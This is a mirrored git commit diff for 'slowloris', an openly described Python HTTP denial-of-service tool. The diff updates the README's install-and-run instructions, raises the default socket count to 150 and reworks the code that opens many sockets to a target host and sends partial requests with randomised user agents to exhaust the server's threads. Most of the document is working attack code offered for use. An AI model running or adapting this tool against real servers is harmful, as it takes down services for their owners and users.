mirror of https://github.com/Askill/slowloris.git
Updated to version 0.1.3
This commit is contained in:
parent
bd7f05707d
commit
a7851b5570
14
README.md
14
README.md
|
|
@ -1,6 +1,6 @@
|
|||
#slowloris.py - Simple slowloris in Python#
|
||||
# slowloris.py - Simple slowloris in Python
|
||||
|
||||
##What is Slowloris?##
|
||||
## What is Slowloris?
|
||||
Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. It works like this:
|
||||
|
||||
1. We start making lots of HTTP requests.
|
||||
|
|
@ -9,12 +9,12 @@ Slowloris is basically an HTTP Denial of Service attack that affects threaded se
|
|||
|
||||
This exhausts the servers thread pool and the server can't reply to other people.
|
||||
|
||||
##How to install and run?##
|
||||
## How to install and run?
|
||||
|
||||
You can clone the git repo or install using **pip**. Here's how you run it.
|
||||
|
||||
* `sudo pip3 install slowloris`
|
||||
* `slowloris --host example.com --sockets 200`
|
||||
* `slowloris example.com`
|
||||
|
||||
That's all it takes to install and run slowloris.py.
|
||||
|
||||
|
|
@ -22,8 +22,10 @@ If you want to clone using git instead of pip, here's how you do it.
|
|||
|
||||
* `git clone https://github.com/gkbrk/slowloris.git`
|
||||
* `cd slowloris`
|
||||
* `python3 slowloris.py --host example.com --sockets 200`
|
||||
* `python3 slowloris.py example.com`
|
||||
|
||||
##License##
|
||||
## Configuration options
|
||||
It is possible to modify the behaviour of slowloris with command-line arguments.
|
||||
|
||||
## License
|
||||
The code is licensed under the MIT License.
|
||||
|
|
|
|||
2
setup.py
2
setup.py
|
|
@ -3,7 +3,7 @@ setup(
|
|||
name = "Slowloris",
|
||||
py_modules = ["slowloris"],
|
||||
entry_points = {"console_scripts": ["slowloris=slowloris:main"]},
|
||||
version = "0.1.6",
|
||||
version = "0.1.3",
|
||||
description = "Low bandwidth DoS tool. Slowloris rewrite in Python.",
|
||||
author = "Gokberk Yaltirakli",
|
||||
author_email = "webdosusb@gmail.com",
|
||||
|
|
|
|||
45
slowloris.py
45
slowloris.py
|
|
@ -1,11 +1,11 @@
|
|||
import socket, random, time, sys, argparse, random
|
||||
|
||||
parser = argparse.ArgumentParser(description="Stress test some sites.")
|
||||
parser.add_argument('host', nargs="?", help="Host to preform stress test on.")
|
||||
parser.add_argument('-p', '--port', default=80, help="Port of webserver, usually 80.", type=int)
|
||||
parser.add_argument('-s', '--sockets', default=8, help="Number of sockets to use in the test.", type=int)
|
||||
parser.add_argument('-v', '--verbose', dest="verbose", action="store_true", help="Enables Verbose mode.")
|
||||
parser.add_argument('-ua', '--randuseragents', dest="randuseragent", action="store_true", help="Enables random useragent mode.")
|
||||
parser = argparse.ArgumentParser(description="Slowloris, low bandwidth stress test tool for websites")
|
||||
parser.add_argument('host', nargs="?", help="Host to preform stress test on")
|
||||
parser.add_argument('-p', '--port', default=80, help="Port of webserver, usually 80", type=int)
|
||||
parser.add_argument('-s', '--sockets', default=150, help="Number of sockets to use in the test", type=int)
|
||||
parser.add_argument('-v', '--verbose', dest="verbose", action="store_true", help="Increases logging")
|
||||
parser.add_argument('-ua', '--randuseragents', dest="randuseragent", action="store_true", help="Randomizes user-agents with each request")
|
||||
parser.set_defaults(verbose=False)
|
||||
parser.set_defaults(randuseragent=False)
|
||||
args = parser.parse_args()
|
||||
|
|
@ -24,7 +24,32 @@ def log(text, level=1):
|
|||
print(text)
|
||||
|
||||
list_of_sockets = []
|
||||
useragents = ["Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50","Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14","Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko","Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36","Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"]
|
||||
user_agents = [
|
||||
"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
|
||||
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
|
||||
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
|
||||
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
|
||||
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
|
||||
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
|
||||
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
|
||||
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
|
||||
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
|
||||
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
|
||||
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
|
||||
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
|
||||
]
|
||||
|
||||
def init_socket(ip):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
|
|
@ -32,10 +57,10 @@ def init_socket(ip):
|
|||
s.connect((ip,80))
|
||||
|
||||
s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
|
||||
if args.randuseragent == True:
|
||||
s.send("{}\r\n".format("User-agent: "+random.choice(useragents)).encode("utf-8"))
|
||||
if args.randuseragent:
|
||||
s.send("User-Agent: {}\r\n".format(random.choice(user_agents)).encode("utf-8"))
|
||||
else:
|
||||
s.send("{}\r\n".format("User-agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0").encode("utf-8"))
|
||||
s.send("User-Agent: {}\r\n".format(user_agents[0]).encode("utf-8"))
|
||||
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
|
||||
return s
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue